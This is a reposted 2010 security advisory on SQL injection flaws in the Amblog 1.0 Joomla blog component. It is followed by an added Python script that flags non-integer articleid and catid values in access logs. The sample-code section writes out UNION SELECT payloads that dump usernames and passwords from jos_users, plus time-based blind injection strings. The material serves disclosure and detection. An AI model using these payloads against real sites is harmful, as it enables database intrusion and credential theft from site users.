[Repost][Recommended] Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities
Posted: 2010-8-11 12:19 2085

Name              Amblog
Vendor            [URL unreadable in source]
Versions Affected 1.0

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX

I. ABOUT THE APPLICATION
________________________

Amblog is a simple blog engine for Joomla CMS.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being
used in SQL queries.

III. ANALYSIS
_____________

Summary:

 A) Multiple SQL Injection
 B) Multiple Blind SQL Injection


A) Multiple SQL Injection
_________________________

Some parameters, such as articleid and catid, are not
properly sanitised before being used in SQL queries. This
can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.


B) Multiple Blind SQL Injection
_______________________________

The articleid parameter is not properly sanitised before
being used in SQL queries. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.

IV. SAMPLE CODE
_______________

A) Multiple SQL Injection

[request URL unreadable in source] UNION SELECT @@version

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

[request URL unreadable in source] UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users


B) Multiple Blind SQL Injection

[request URL unreadable in source] OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

[request URL unreadable in source] OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

V. FIX
______

No fix.
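
With no vendor fix available, one interim control is to treat articleid and catid as strict integers and flag any request in the web server access log where they are not. The following is an added example, not part of the original advisory or of Amblog's code; it assumes combined-format access logs, that legitimate ids are unsigned decimal integers, and the option name com_amblog (taken from Joomla's com_<name> convention), and its log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Parameters the advisory names as reaching SQL queries unsanitised.
WATCHED_PARAMS = {"articleid", "catid"}
# Assumption: legitimate ids are plain unsigned decimal integers.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (not from the advisory); com_amblog is assumed
# from Joomla's com_<name> component naming convention.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Aug/2010:12:19:00 +0000] "GET /index.php?option=com_amblog&catid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Aug/2010:12:20:41 +0000] "GET /index.php?option=com_amblog&catid=1%20UNION%20SELECT%20@@version HTTP/1.1" 200 812',
    '203.0.113.9 - - [11/Aug/2010:12:21:02 +0000] "GET /index.php?option=com_amblog&articleid=7%2527 HTTP/1.1" 500 310',
    '198.51.100.2 - - [11/Aug/2010:12:22:10 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 9001',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded input is seen decoded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return [(name, decoded_value)] for watched params that are not plain integers."""
    hits = []
    # keep_blank_values: an empty id is not a valid integer either.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in WATCHED_PARAMS:
            value = fully_decode(value)
            if not VALID_ID.fullmatch(value):
                hits.append((name, value))
    return hits

def scan_log(lines):
    """Return [(line_number, hits)] for log lines whose request carries a bad id."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            flagged.append((number, hits))
    return flagged
```

The same integer-only rule can be enforced in front of the site (reverse proxy or WAF) so that non-numeric articleid and catid values never reach the component.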
